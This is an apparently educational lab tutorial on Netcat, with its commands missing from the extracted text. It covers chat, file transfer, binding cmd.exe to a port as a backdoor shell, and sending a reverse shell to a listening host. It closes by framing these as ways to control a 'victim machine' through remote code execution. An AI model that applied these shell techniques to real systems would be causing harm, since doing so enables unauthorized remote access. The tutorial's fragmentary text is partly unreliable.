Introduction to using Netcat
connections using TCP or UDP
; this dual functionality suggests that Netcat runs in
two modes: “client” and “server”. Netcat is designed to be a dependable “back-
end” device that can be used candidly or easily driven by other programs and
scripts. At the same time, it is a feature-rich network debugging and investigation
tool, since it can produce almost any kind of correlation you would need and has
a number of built-in capabilities.
Its list of features includes port scanning, transferring files, and port listening, and
it can be used as a backdoor.
We need for this lab two machines , the first that runs BackTrack 3 and the other
runs Windows XP .
Listening on a TCP/UDP port using Netcat is useful for network debugging client
applications, or otherwise receiving a TCP/UDP network connection.
Let's try implementing a simple chat using Netcat.
To be familiar with options of Netcat, you can type
From Backtrack : we want to listen on port 50000 and accept incoming
connections on this port , type:
Check to see that port 50000 is indeed listening using netstat
You will see
listening on [any] 50000 ...
This ip is the ip of backtrack.
able to run this command. <
After connection established we can start chat as shown in the figures
Netcat can also be used to transfer files from one computer to another. This
applies to text and binary files.
In order to send a file from Computer 2 to Computer 1, try the following
From Backtrack : We'll set up Netcat to listen to and accept the connection
In Windows machine we create text file test.txt; then we connect to
The connection will established and the file will transferred to Backtrack
and this is shown in figures below.
From backtrack : check that the file was transferred correctly , as shown in
Check that the file correctly transferred
One of Netcat's neat features is command redirection. This means that Netcat
can take an exe file and redirect the input, output and error messages to a
TCP/UDP port, rather than to the default console.
Take for example the cmd.exe executable. By redirecting the stdin/stdout/stderr
to the network, we can bind cmd.exe to a local port. Anyone connecting to this
port will be presented with a command prompt belonging to this computer.
; so that
Anyone connecting to port 9999 on this machine will be presented with
command prompt, with the permissions that nc was run with. As shown in
the figure below.
From Windows :type
to connect to
other machine that listening on port 9999 as illustrated in the figure ; after
connection established you will presented with the shell of Backtrack.
Now we can use any available command as we in front of the remote
PC.(as example : try ifconfig, date, cal and so on.)
After connection ; trying ifconfig, date on the victim machine
Another interesting Netcat feature is the ability to send a command shell to a
listening host. So in this situation, although Alice cannot bind a port to cmd.exe
locally to her computer and expect Bob to connect, she can send her command
prompt to Bob's machine.
; now windows is listening on port 6677
and waiting incoming connection.
; now you try to
connect to windows machine and send your shell (backtrack shell) to it.
I execute some commands like date, like. Then, turned off backtrack by
typing init 0 command.
Figures below shows this process before connection and after connection
from remote computer that run windows XP.
Windows xp wait connection on port 6677 ; after connection established the shell of the backtrack reveres to XP
Netcat has other nice features and uses such as simple sniffing abilities, port
redirection and others which you can learn about if you interested.
Now How to I get Netcat to run on the victim machine, without remote user
intervention? The answer to this question is simply “remote code execution”.
Ninety percent of attack vectors can be summarized with the pair of words “code
execution”. For example, attacks such as Buffer Overflows, SQL injection, File
Inclusion, Client Side Attacks, Trojan Horses - all aim to result in “code execution”
on the victim machine. Simple using for this will be presented in virus and Trojan